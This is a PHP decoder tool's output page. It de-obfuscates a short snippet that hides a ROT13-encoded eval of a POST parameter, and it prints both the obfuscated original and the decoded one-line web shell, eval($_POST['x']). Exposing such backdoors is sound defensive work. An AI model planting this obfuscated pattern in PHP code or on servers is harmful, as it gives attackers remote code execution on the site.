Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
4a5feb12465f66947af2f40a4785344e <?php function a($a="214s2d5") { eval("/*fdf12d1f*/..
Decoded Output download
/*fdf12d1f*/eval($_POST["x"]);/*fdf12d1f*/
Did this file decode correctly?
Original Code
4a5feb12465f66947af2f40a4785344e
<?php
function a($a="214s2d5")
{
eval("/*fdf12d1f*/".str_rot13($a)."/*fdf12d1f*/");
}
a('riny($_CBFG["k"]);');
?>
Function Calls
a | 1 |
str_rot13 | 1 |
Stats
MD5 | 14a1e3f7619afba1eabea6c9cbdb516a |
Eval Count | 1 |
Decode Time | 70 ms |